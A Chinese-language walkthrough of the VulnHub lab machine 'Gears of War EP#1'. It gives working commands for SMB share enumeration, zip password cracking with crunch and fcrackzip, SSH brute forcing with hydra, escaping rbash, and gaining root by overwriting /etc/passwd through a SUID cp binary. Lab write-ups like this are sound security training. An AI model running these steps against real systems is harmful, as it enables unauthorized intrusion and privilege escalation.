目录
介绍
系列:Gears of War(此系列仅此一台)
发布日期: 2019年10月17日
难度: 初级
Flag : 不详
学习:SMB攻击
靶机地址:https://www.vulnhub.com/entry/gears-of-war-ep1,382/
涉及到的相关工具,参见之前的文章:HACKNOS: OS-BYTESEC
信息收集
主机发现
netdiscover主机发现
对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。
主机信息探测
信息探测:nmap -A -p- 192.168.124.10,开放了22、80、139、445端口,445的信息过多,靶机的重点是在445上。
访问网站
会注意到网站上面有一个按钮,点击之后依然是一个静态页面,没啥玩的。
测试 samba 安全
smbmap 访问默认共享
smbmap -H 192.168.124.10,发现LOCUS_LAN$有读取权限
递归读取LOCUS_LAN$文件夹:smbmap -H 192.168.124.10 -R LOCUS_LAN$
enum4linux 获取系统用户
使用命令:enum4linux 192.168.124.10 -R | grep Local
枚举出三个用户:marcus、root、nobody
smbclient获取文件
使用空密码连接靶机的共享文件夹,使用get命令下载文件
查看文件
压缩包需要密码才能打开,txt给了一些提示,猜测是@%%,的某一种排列组合才能打开数据包
- 生成字典:
crunch 4 4 -t @%%, > list.txt - 爆破压缩包
- 安装工具:
sudo apt-get install fcrackzip - 爆破:
fcrackzip -D -u -p list.txt msg_horda.zip
- 安装工具:
翻译一下,给了我们一些字符:3_d4y。大概率就是这个靶机上的某用户的名字或者密码,由于压缩包解压之后得到的是key.txt,猜测这个应该是密码。
SSH爆破
hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.124.10
登录SSH
使用命令:ssh marcus@192.168.124.10
发现自己的家目录里面有个文件夹,但是访问它的时候被拒了,提示rbash是受限制的。
绕过rbash
指定终端:ssh marcus@192.168.124.10 -t "bash -noprofile"
进来之后,发现啥也没有
提权
家目录下没啥文件,直接提权吧。
- 查找SUID文件:
find / -type f -perm -u=s 2>/dev/null
发现了cp,剩下的简单了,替换passwd文件实现提权即可
- 提取出靶机的passwd文件:
cat /etc/passwd > passwd - kali通过OpenSSL passwd生成一个新的用户hacker,密码为hack123:
┌──(root💀kali)-[~]
└─# openssl passwd -1 -salt hack hack123
$1$hack$WTn0dk2QjNeKfl.DHOUue0
- 编辑passwd文件
把第一行root的内容复制下来,然后修改一下
- 覆盖掉原来的passwd文件
查看flag
上面的那张截图不是没有查看到文件,而是ssh缩放导致flag没显示出来,我缩小一下ssh终端即可
参考
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/134257.html
